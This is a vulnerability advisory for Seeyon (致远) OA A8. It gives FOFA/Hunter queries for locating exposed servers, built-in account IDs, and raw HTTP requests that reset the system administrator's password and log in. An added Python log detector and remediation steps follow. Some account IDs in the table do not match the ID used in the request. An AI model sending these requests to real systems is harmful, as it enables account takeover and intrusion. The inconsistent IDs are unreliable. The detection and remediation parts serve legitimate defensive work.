Description

An attacker who knows a username can craft a special request to change the system administrator's password, log in to the system backend, obtain sensitive data, and perform arbitrary administrator operations; after using the reset password to obtain a cookie through the interface, the attacker can getshell.

Search syntax

hunter: app.name="致远 OA"
fofa: app="致远A8"

Users and corresponding IDs

seeyon-guest  -696400025239268 (ignore)
system        -72730320132347481 (ignore)
audit-admin   -440160666363 (ignore)
group-admin   5725175934914479521

Vulnerability verification

1. Password reset, verifying the currently logged-in user

PUT /seeyon/rest/orgMember/-7273032013234748168/password/genericController.do HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=3891CB3E3CA435C599001E4F03A335B0; loginPageURL=
Connection: close

2. Login verification

POST /seeyon/rest/authentication/ucpcLogin?login_username=system&login_password=genericController.do&ticket= HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=3891CB3E3CA435C599001E4F03A335B0; loginPageURL=
Connection: close

3. Log in with the reset password (system/genericController.do); resetting other users works the same way.
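From the defender's side, the two requests shown above leave a distinctive trace in the web server access log: a PUT to /seeyon/rest/orgMember/<id>/password/... followed shortly afterwards by a POST to /seeyon/rest/authentication/ucpcLogin from the same source address. The following Python script is an added example, not code from the page or from the Seeyon product; it parses constructed combined-format access log lines (the IPs, timestamps and sizes are made up) and raises a high-severity alert when a password reset on the orgMember endpoint is followed by a ucpcLogin within a configurable window, and a medium-severity alert for the reset alone.

```python
import re
from collections import defaultdict
from datetime import datetime

# Combined log format: ip ident user [time] "METHOD path HTTP/x" status size
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) (\S+)')

# The endpoint abused for the unauthenticated password reset (member ID captured).
RESET_RE = re.compile(r'^/seeyon/rest/orgMember/(-?\d+)/password(?:/|$)')
# The login endpoint used right after the reset in the write-up.
LOGIN_RE = re.compile(r'^/seeyon/rest/authentication/ucpcLogin')

# Constructed sample log lines (hypothetical addresses and timestamps, not from the page).
SAMPLE_LOG = """\
203.0.113.10 - - [12/Jul/2023:10:15:01 +0800] "GET /seeyon/main.do HTTP/1.1" 200 5123
203.0.113.10 - - [12/Jul/2023:10:15:07 +0800] "PUT /seeyon/rest/orgMember/-7273032013234748168/password/genericController.do HTTP/1.1" 200 42
203.0.113.10 - - [12/Jul/2023:10:15:12 +0800] "POST /seeyon/rest/authentication/ucpcLogin?login_username=system&ticket= HTTP/1.1" 200 318
198.51.100.7 - - [12/Jul/2023:10:20:00 +0800] "GET /seeyon/index.jsp HTTP/1.1" 200 2048
198.51.100.7 - - [12/Jul/2023:10:20:05 +0800] "PUT /seeyon/rest/orgMember/5725175934914479521/password/genericController.do HTTP/1.1" 200 42
"""


def parse_line(line):
    """Return a dict with ip, time, method, path (query string stripped), status; None if unparseable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, ts, method, target, status, _size = m.groups()
    return {
        "ip": ip,
        "time": datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z"),
        "method": method.upper(),
        "path": target.split("?", 1)[0],
        "status": int(status),
    }


def detect(log_text, window_seconds=300):
    """Correlate orgMember password resets with a following ucpcLogin from the same IP."""
    resets = defaultdict(list)   # ip -> [(time, member_id)]
    logins = defaultdict(list)   # ip -> [time]
    for line in log_text.splitlines():
        e = parse_line(line)
        if not e:
            continue
        m = RESET_RE.match(e["path"])
        if m and e["method"] == "PUT":
            resets[e["ip"]].append((e["time"], m.group(1)))
        elif e["method"] == "POST" and LOGIN_RE.match(e["path"]):
            logins[e["ip"]].append(e["time"])

    alerts = []
    for ip, items in resets.items():
        for t, member_id in items:
            # A login from the same source shortly after the reset is the full attack chain.
            followed = any(0 <= (lt - t).total_seconds() <= window_seconds for lt in logins.get(ip, []))
            alerts.append({
                "ip": ip,
                "member_id": member_id,
                "time": t.isoformat(),
                "severity": "high" if followed else "medium",
            })
    return alerts


if __name__ == "__main__":
    for a in detect(SAMPLE_LOG):
        print(f'{a["severity"].upper():6} {a["ip"]:15} reset of member {a["member_id"]} at {a["time"]}')
```

Any PUT to the orgMember password endpoint that does not originate from an authenticated administrative session is worth an alert on its own; the login correlation only raises the priority. On a real deployment, run the same check over the reverse proxy's log rather than the application's, since the application log may not record the REST calls at all.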

Remediation

1. Disable external access to sensitive system interfaces.

2. Upgrade the product to the latest version promptly.